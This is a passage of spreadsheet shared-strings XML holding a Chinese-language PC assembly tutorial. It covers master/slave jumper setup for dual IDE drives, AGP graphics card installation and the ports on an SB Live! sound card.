        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排线和电源线。</t>
    </r>
  </si>
  <si>
    <r>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、双外部存储器的安装　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>许多时候我们需要在一根</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>线上连接两个存储设备，如两个硬盘、两个光驱或一个硬盘一个光驱，这时该怎么来安装呢？　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）安装双外部存储设备的条件：　　</t>
    </r>
  </si>
  <si>
    <t>①机箱电源能满足新增外部存储设备电源需求　　</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>一般机箱中的电源输出功率都在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>200W</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>以上，按理说加块硬盘应该没问题。但如果你的使用是耗电量大的显卡，另外又加装了</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DVD</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>等，那么就要考虑电源是否还能再提供</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>12W</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>左右功率去支持一块硬盘。　　</t>
    </r>
  </si>
  <si>
    <t>②尚有空闲的硬盘线插头　</t>
  </si>
  <si>
    <r>
      <t>现在的电脑主板都能提供</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口，可接两根双插头的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>40</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>芯硬盘线（数据线）挂</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>块</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>兼容设备，按一般的配置两根电缆可接四块诸如硬盘、光驱或</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ZIP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高密软驱等</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设备。但如果你只有一条</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>40</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>芯数据线，就赶快再买一根预备着。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）主、从状态设置和安装：　</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>当以上几个条件都具备后，在安装到机箱中以前还将两块硬盘按自己的意愿分别设置成主盘和从盘，这样安装后才能被系统接纳正常使用。主、从盘的设置可按以下方法进行：</t>
    </r>
  </si>
  <si>
    <r>
      <t>所有的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设备包括硬盘都使用一组跳线来确定安装后的主、从状态。硬盘跳线器大多设置在电源联接座和数据线联接插座之间的地方，通常由</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>组（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>6</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>或</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>7</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）针或</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>组（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>8</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>或</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>9</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）针再加一个或两个跳线帽组成。另外在硬盘或光驱正面或反面一定还印有主盘（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Master</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）、从盘（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Slave</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）以及由电缆选择（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cableselect</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）的跳线方法。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>各类硬盘或光驱的跳线方法和标记说明大同小异，所以这里只将希捷硬盘的跳线方法简单介绍如下，对于其它品牌硬盘可以参照进行。以希捷</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ST33221A</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>为例，硬盘上不但印制了跳线说明而且还标明电源线和硬盘线的正确联接方法。</t>
    </r>
  </si>
  <si>
    <r>
      <t>（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）安装双硬盘时需注意的问题：　　</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>如果新增加的硬盘与光驱等设备一起接在第二硬盘线上时，要注意光驱等设备的主、从盘设置不与新加硬盘相冲突，否则也会出现主板检测不到新增硬盘或者找不到原光驱问题。一般情况下硬盘和光驱可以按在机箱中的安装位置就近联接，但考虑不同型号、规格的硬盘以及硬盘与光驱的之间数据传输率不同，所以可根据具体</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IDE</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>设备的实际情况联接。</t>
    </r>
  </si>
  <si>
    <t>七、安装显卡、声卡、网卡　　</t>
  </si>
  <si>
    <t>显卡、声卡、网卡等插卡式设备的安装大同小异：　　</t>
  </si>
  <si>
    <r>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、安装显卡</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>　　</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>在安装显卡前也需注意，显卡都由许多精密的集成电路及其它元器件构成，这些集成电路很容易受到静电影响而损失，所以在安装前做好以下准备。　　</t>
    </r>
  </si>
  <si>
    <t>——请将电脑的电源关闭，并且拔除电源插头。　　</t>
  </si>
  <si>
    <t>——拿取显示卡时请尽量必免金属接线部分，且组好能够戴上防静电手套。　　</t>
  </si>
  <si>
    <r>
      <t>——当你将主板中的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ATX</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电源插座上的插头拔除时，请确认电源的开关是关闭状况。</t>
    </r>
  </si>
  <si>
    <t>安装显卡主要可分为硬件安装和驱动安装两部分。</t>
  </si>
  <si>
    <r>
      <t>硬件安装就是将显卡正确的安装到主板上的显卡插槽中，其需要掌握的要点是要注意</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>AGP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插槽的类型（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>AGP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接口的发展经历了</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>AGP1X/2X/PRO/4X/8X</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>等等阶段，其传输速度也从最早的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>AGP1X</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>266MHz/S</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的带宽发展到了</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>AGP8X</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>2GB/S</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>AGP1X/AGP2X/AGP4X/AGP Pro</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>等几种显卡插槽都不相同，排在后面的显卡规范插槽一般可以兼容前面的显卡规范插槽，例如</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>AGP4X</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>规范的显卡插槽可以使用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>AGP2X</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的显卡，而</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>AGP4X</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的显卡就不能在</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>AGP2X</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的显卡插槽上正常使用。）。其次，在安装显卡时一定要关掉电源，并注意要将显卡安装到位。</t>
    </r>
  </si>
  <si>
    <r>
      <t>第一步，从机箱后壳上移除对应</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>AGP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插槽上的扩充挡板及螺丝。　</t>
    </r>
  </si>
  <si>
    <r>
      <t>第二步、将显卡很小心的对准</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>AGP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插槽并且很确实的插入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>AGP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插槽中。注意：务必确认将卡上的金手指的金属触点很确实的与</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>AGP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插槽接触在一起。　</t>
    </r>
  </si>
  <si>
    <t>第三步，用解刀将螺丝锁上使显卡确实的固定在机箱壳上。　</t>
  </si>
  <si>
    <r>
      <t>第四步，将显示器上的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>15-pin</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接脚</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>VGA</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>线插头插在显卡的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>VGA</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>输出插头上。　</t>
    </r>
  </si>
  <si>
    <t>最后一步，确认无误后，重新开启电源，即完成显卡的硬件安装。</t>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、安装声卡　</t>
    </r>
  </si>
  <si>
    <t>——主要接口一览：　　</t>
  </si>
  <si>
    <r>
      <t>声卡上有很多接口，下面我们就对其进行一下简单介绍。（以创新</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>SB Live</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>！为例。）</t>
    </r>
  </si>
  <si>
    <r>
      <t>a.</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>游戏杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/MIDI</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>插口：用于连接游戏杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手柄</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方向盘等外界游戏控制器或</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MIDI</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>键盘</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子琴，你也可先购买一个光纤</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MIDI</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>套件再来插入上述设备。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>b.</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后置输出插孔：将音频信号输出到有源音箱或功率放大器。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>c.</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>线性输出插孔（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>LINE OUT</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）：将音频信号输出到有源音箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>耳机或功率放大器。</t>
    </r>
  </si>
  <si>
    <r>
      <t>d.</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>话筒输入插孔（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MIC IN</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）：用于连接话筒，主要用来语音输入。　　</t>
    </r>
  </si>
  <si>
    <r>
      <t>e.</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>线性输入插孔（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>LINE IN</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）：用于将随身听或影碟机等外部设备的声音信号输入电脑。　</t>
    </r>
  </si>
  <si>
    <r>
      <t>f.</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电话应答设备接口（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>TAD</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Telephone Answering Device</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）：用来提供标准语音</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MODEM</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
